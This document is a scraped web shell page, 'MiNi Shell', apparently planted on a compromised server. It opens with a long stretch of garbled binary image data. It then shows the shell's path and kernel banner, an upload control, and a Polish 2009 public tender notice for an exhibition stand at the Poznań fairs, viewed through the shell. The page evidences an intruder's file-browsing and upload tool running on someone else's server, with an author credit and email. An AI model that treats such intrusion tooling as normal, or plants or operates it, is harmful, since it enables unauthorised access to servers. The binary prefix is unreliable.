JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090730/123153-N-2009.html

<p class="kh_header"><b>Warszawa: Zaprojektowanie i wykonanie zabudowy stoiska wystawienniczego ARR (włącznie z demontażem) na targach POLAGRA FOOD 2009 I FARMA 2009 o powierzchni 60 m2 na terenie Międzynarodowych Targów Poznańskich.</b><br>
<b>Numer ogłoszenia: 123153 - 2009; data zamieszczenia: 30.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rynku Rolnego , ul. Nowy Świat 6/12, 00-400 Warszawa, woj. mazowieckie, tel. 022 6617347, faks 022 6617535.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie zabudowy stoiska wystawienniczego ARR (włącznie z demontażem) na targach POLAGRA FOOD 2009 I FARMA 2009 o powierzchni 60 m2 na terenie Międzynarodowych Targów Poznańskich..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zaprojektowanie, wykonanie, montaż i demontaż stoiska wystawienniczego Agencji Rynku Rolnego o powierzchni 60 m2 (wymiary stoiska: 8,0 m x 7,5 m, typ stoiska: półwyspowy) na terenie Międzynarodowych Targów Poznańskich (MTP), podczas targów:
1) Polagra FOOD 2009, odbywających się 14 - 17 września 2009 r. oraz 
2) FARMA 2009, odbywających się 9 - 11 października 2009 r.
2. Zamówienie obejmuje:
2.1. Koncepcję; opracowanie koncepcji i wykonanie projektów stoiska.
- projekt stoiska będzie załącznikiem do umowy (odpowiednio - załącznik nr 1 do umowy dla projektu stoiska Polagra FOOD , załącznik nr 2 do umowy dla projektu stoiska FARMA 2009),
- projekty stoiska powinny być do siebie maksymalnie podobne, a różnice między nimi powinny wynikać tylko z ewentualnie innej lokalizacji stoiska w hali podczas targów Polagra FOOD 2009 oraz FARMA 2009.
- do projektów należy dołączyć wizualizację z kilku kierunków obserwacji.
2.2. Wykonanie zabudowy stoiska w systemie oktanorm. Dopuszcza się inne systemy i  elementy konstrukcji w celu uatrakcyjnienia stoiska.
2.3. Wyposażenie; przedstawienie specyfikacji wyposażenia (będzie ona jednocześnie załącznikiem nr 3 do umowy), rodzaju i opisu poszczególnych elementów:
- wyposażenie w meble stosownie do przeznaczenia pomieszczeń zgodnie z  poniższym opisem (meble nie mogą nosić śladów zużycia),
- wyposażenie w sprzęt gospodarstwa domowego (zgodnie z opisem - pkt 3.4., lit. c),
- zamówienie i wyposażanie stoiska w stałe łącze internetowe (z dojściem do komputerów Zamawiającego; w tym wejście w przestrzeni otwartej) - zgodnie z Warunkami uczestnictwa dla Polagra FOOD 2009 i FARMA 2009 (zwanymi dalej Warunkami uczestnictwa) i Regulaminem dla uczestników targów. Przepisy techniczne i przeciwpożarowe (zwanym dalej Regulaminem MTP) - dostępne na stronie internetowej MTP http://www.mtp.pl,
- wykonanie i zamontowanie elementów identyfikujących stoisko ARR (znaki firmowe, nie mniej niż 4 szt.).
2.4. Dokumentację techniczną; wykonanie pełnej dokumentacji technicznej zabudowy stoiska oraz zatwierdzenie projektów stoiska w MTP, zgodnie z Regulaminem MTP.
2.5. Zamówienie i wykonanie podłącza elektrycznego oraz instalacji elektrycznej zgodnie z Warunkami Uczestnictwa i Regulaminem MTP, z zapewnieniem odpowiedniej liczby gniazd elektrycznych w każdym pomieszczeniu - min. 4, przedłużaczy i  rozgałęziaczy, kabli do podłączeń sprzętu.
2.6. Zamówienie i wykonanie przyłącza wodociągowo-kanalizacyjnego - zgodnie z  Warunkami uczestnictwa i Regulaminem MTP.
2.7. Wykonanie robót tapicersko-dekoratorskich (w tym ułożenie nowej wykładziny jedno lub dwukolorowej w barwach współgrających z wyposażaniem i  projektem aranżacji stoiska), Wyposażenie stoiska w żywe kwiaty i rośliny uzupełniające scenografię.
2.8. Sprzątanie stoiska przed i w trakcie targów, włącznie z wywozem odpadów -zgodnie ze stawkami określonymi w Warunkach uczestnictwa.
3. Projekty i wykonanie zabudowy stoiska muszą uwzględniać następujące oczekiwania Zamawiającego:
3.1. Podział przestrzeni:
Wydzielenie z powierzchni 60 m2 : pokoju spotkań, pomieszczenia kuchennego, pomieszczenia magazynowego oraz powierzchni otwartej.
a) Pokój spotkań dla 10-12 osób; pokój powinien być umiejscowiony obok pomieszczenia kuchennego, z wejściem z pomieszczenia kuchennego oraz odrębnym wejściem z powierzchni otwartej,
b) Pomieszczenie kuchenne - wejście z powierzchni otwartej oraz połączone z pokojem spotkań,
c) Pomieszczenie magazynowe - wejście z powierzchni otwartej.
3.2. Przestrzeń otwarta powinna być kompozycyjnie rozwiązana w ten sposób, aby umożliwiała łatwość obsługi klientów/zwiedzających targi. Przestrzennie powinna mieć wydzielone miejsce (stoliki) do prowadzenia indywidualnych rozmów (wydzielenie kompozycyjne min. jednego stolika).
3.3. Należy zwrócić uwagę, aby ewentualnie istniejące w podanej lokalizacji stoiska elementy konstrukcyjne hali wystawowej (np. filary) nie kolidowały funkcjonalnie ze stoiskiem (w szczególności nie zasłaniały i nie utrudniały dostępu do powierzchni otwartej, skierowanej do zwiedzających).
3.4. Wyposażenie pomieszczeń:
a) Powierzchnia otwarta musi być wyposażona w:
- ladę dla konsultantów z siedzeniami; lada powinna być umieszczona od   frontu stoiska (frontem do głównych ciągów komunikacyjnych), z możliwością ustawienia komputerów przenośnych,
- szafkę zamykaną na klucz; może być zamieszczona pod ladą lub stanowić jej element składowy,
- stoliki (min. 2szt.) z krzesłami, 
- 6 wysokich stojaków na broszury ARR (ok. 2 m wysokości każdy), z logo ARR na górze; wymiar broszur ARR - A5 i B5,
- stałe łącze internetowe.
b) Pokój spotkań: 
- powinien być wyposażony w stoliki z możliwością ich zestawienia dla 10 - 12 osób, wraz z krzesłami,
- należy zapewnić krzesła i stoliki rezerwowe dla dodatkowych 4 osób,
- szafkę zamykaną na klucz,
- stałe łącze internetowe.
c) Pomieszczenie kuchenne:
- powinno mieć podłączenia wodno-kanalizacyjne (zlew) oraz podłączenia do prądu na sprzęt AGD (np. czajnik, mikrofalówka, płyta grzewcza, lodówka).
- powinno być wyposażone w sprzęt AGD tj.:lodówka z zamrażarką - 2 szt.,
dwupalnikowa kuchenka elektryczna, wysokociśnieniowy ekspres do kawy (na kawę ziarnistą), kuchenka mikrofalowa z grillem - 2 szt., czajnik elektryczny o dużej mocy - 2 szt., zlewozmywak dwukomorowy, regał na naczynia i żywność, nie mniej niż 4 półki (powierzchnie półki ok. 2 m2), odkurzacz.
- powinny znajdować się funkcjonalne lady, służące i przystosowane do przygotowywania posiłków,
- powinny znajdować się szafki pod całą długością lady i półka wisząca nad ladą,
- podłoga powinna być pokryta wykładziną zmywalną, np. PCV.
d) Pomieszczenie magazynowe:
- powinno być wyposażone w regały na materiały reklamowe i w szafki (min. 2 szafki zamykane na klucz),
- w zależności od powierzchni - ewentualnie 1 stolik z krzesłami,
- stałe łącze internetowe.
e) Inne uwagi:
- we wszystkich pomieszczeniach powinno być doprowadzone źródło prądu i  powinna być zabezpieczona odpowiednia ilość podłączeń do prądu (wg ww. opisu),
- we wszystkich pomieszczeniach zamkniętych powinny być wieszaki na odzież oraz kosze na śmieci (kosz również na przestrzeni otwartej),
 - należy zapewnić dodatkowe dekoracje z żywych roślin: kompozycje kwiatowe na stoły w pokoju spotkań oraz w punktach powierzchni otwartej - w zależności od koncepcji dekoratora.
3.5. Wykończenie stoiska obejmujące:
a) Odpowiednie oświetlenie pomieszczeń (zgodnie z normą PN-EN12464-1:2002) oraz doświetlenie elementów scenograficznych stoiska.
b) Wykonanie i zamontowanie elementów identyfikujących stoisko ARR. Znaki i  napisy firmowe powinny być dobrze widoczne dla zwiedzających targi oraz  w proporcjonalnej wielkości do rozmiarów stoiska i danego elementu. 
c) Znaki identyfikujące stoisko ARR (znaki firmowe, nazwa firmy) będą wykonane według podstawowych wzorów logo, które są dostępne w wersji elektronicznej w siedzibie OT ARR Poznań i zostaną przekazane po podpisaniu umowy. Jednym z elementów graficznych powinien być numer telefonicznego Punktu Informacyjnego ARR. Podstawowe wzory logo ARR (napisy Agencja Rynku Rolnego i  www.arr.gov.pl oraz ikona) mogą występować samodzielnie.
4. Wykonanie i kolorystyka:
4.1. Stoisko musi być wykonane w sposób estetyczny, funkcjonalny oraz podkreślający tożsamość wizualną ARR. 
4.2. Meble i wszystkie elementy stoiska powinny współgrać ze sobą kolorystycznie. 
4.3. Kolorystyka znaków firmowych ARR ma być zbliżona do koloru drukarskiego Pantone 355 (zieleń nasycona). Przez kolorystyka zbliżona rozumie się najbliższą możliwą do uzyskania w danej technice. Dopuszcza się zastosowanie znaków firmowych i napisów w wersji zielonej na białym tle lub białej na zielonym tle, jednak z zastrzeżeniem, że ta druga wersja stanowi mniej niż połowę wszystkich znaków firmowych i napisów umieszczonych na stoisku.
4.4. Należy zastosować materiały jakościowo odpowiadające standardom stosowanym na międzynarodowych wystawach oraz środki wystawowe poprawiające prezencję i atrakcyjność stoiska (np. elementy ruchome, napisy i  inne elementy zdobieniowe wykonane w sposób przełamujący symetryczny i prostokątny charakter stoiska).
5. Zamawiający dopuszcza możliwość modyfikacji projektu stoiska po podpisaniu umowy do 15% projektu wyjściowego (po przedstawieniu Projektu przez wykonawcę - zgodnie z § 1 ust. 3 Istotnych Postanowień Umowy). Wszystkie projekty oraz ich ewentualne modyfikacje, wynikające z użytkowania lub nieprzewidzianych okoliczności, wymagają akceptacji Zamawiającego z zachowaniem formy pisemnej pod rygorem nieważności. Zmiany mogą dotyczyć elementów wykończeniowych i  wyposażenia, bez ingerencji w podstawową koncepcję projektu. W terminie trzech dni od pisemnego zaakceptowania powyższych zmian przez Zamawiającego, Wykonawca dostarczy Zamawiającemu specyfikację wyposażenia, która stanowić będzie załącznik nr 3 do umowy.
6. Montaż i demontaż Wykonawca jest zobowiązany przeprowadzić w terminach wskazanych w Postanowieniach szczegółowych dotyczących Polagra FOOD 2009 i  FARMA 2009 (zwanych dalej Postanowieniami szczegółowymi), dostępnych na stronie MTP http://www.mtp.pl. W przypadku przekroczenia terminu dodatkowe koszty wynajmu poniesie Wykonawca.
6.1. Protokolarne przekazanie przez Wykonawcę zabudowanego i wyposażonego stoiska nastąpi nie później niż do godz. 18.00 w dniu poprzedzającym otwarcie każdej edycji targów.
6.2. Podstawą przekazania stoiska Zamawiającemu przez Wykonawcę będą Protokoły zdawczo-odbiorcze podpisane przez obie Strony. W razie uwag Zamawiającego zostaną one uwzględnione w Protokołach zdawczo-odbiorczych, a Wykonawcy zostanie wyznaczony termin do usunięcia usterek/ braków.
7. Sprzęt pozostający na stoisku Zamawiającego w trakcie montażu, trwania targów (również w godzinach nocnych) oraz demontażu, należący do Wykonawcy pozostaje pod pieczą Wykonawcy. Do Wykonawcy należy zabezpieczenie i/lub ubezpieczenie należącego do niego sprzętu, zamontowanego i/lub wykorzystywanego na stoisku. 
8. Wykonawcę obowiązują wszystkie wskazania dotyczące współpracy i zamawiania usług na rzecz Zamawiającego wg Regulaminu MTP, Warunków uczestnictwa oraz Postanowień szczegółowych - dostępnych na stronie internetowej MTP, tj. http://www.mtp.pl.
9. Wykonawca samodzielnie zapewnia sobie prawo wjazdu na teren MTP oraz ponosi opłaty związane z pracami montażowymi i demontażowymi, a także ponosi ewentualne kary przewidziane w Regulaminie MTP.
10. Szczegółowy plan lokalizacji stoiska podczas targów Polagra FOOD 2009 oraz   FARMA 2009 do pobrania w biurze MTP /Zespół Projektowy Targów Polagra FOOD 2009 i Zespół Projektowy Targów FARMA 2009..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.93.00.00-2, 79.93.30.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych, spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ustawy Prawo zamówień publicznych.
2. Zamawiający uzna, że wykonawca spełnia warunki udziału w niniejszym postępowaniu, jeżeli wykonał w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej 2 usługi polegające na zaprojektowaniu, wykonaniu i montażu stoiska wystawienniczego o  wartości nie mniejszej niż 35 000 PLN (słownie: trzydzieści pięć tysięcy złotych) brutto każda (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek ten mogą spełniać łącznie), oraz załączy dokumenty potwierdzające, że usługi te zostały wykonane należycie.
3. Złożenie przez wykonawców w ofercie dokumentów i oświadczeń, wymienionych w pkt VIII SIWZ będzie stanowiło podstawę do oceny spełniania warunków udziału w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów i  oświadczeń, czy   wykonawca spełnia wszystkie w/w warunki udziału w postępowaniu. Zamawiający wykluczy z postępowania wykonawcę, który nie  spełnia wymaganych warunków oraz jeżeli stwierdzi, że dostarczone przez niego informacje mające wpływ na wynik prowadzonego postępowania są  nieprawdziwe. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy z  postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca wraz z formularzem oferty, stanowiącym Załącznik nr 1 do SIWZ, zobowiązany jest złożyć:
a) oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu wg wzoru stanowiącego Załącznik nr 2 do SIWZ;
b) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania;
c) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z informacją o wykonaniu przynajmniej 2 usług polegających na zaprojektowaniu, wykonaniu i montażu stoiska wystawienniczego o wartości nie mniejszej niż 35 000 PLN (słownie: trzydzieści pięć tysięcy złotych) brutto każda, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (wg wzoru stanowiącego Załącznik nr 3 do SIWZ) oraz załączenia dokumentów potwierdzających, że usługi zostały wykonane należycie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - jakość, funkcjonalność - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.arr.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Oddział Terenowy Agencji Rynku Rolnego w Poznaniu, ul. Marcelińska 90, pokój nr 12.3..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2009 godzina 12:00, miejsce: Oddział Terenowy Agencji Rynku Rolnego w Poznaniu, ul. Marcelińska 90, 60-324 Poznań, Kancelaria Oddziału - parter..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com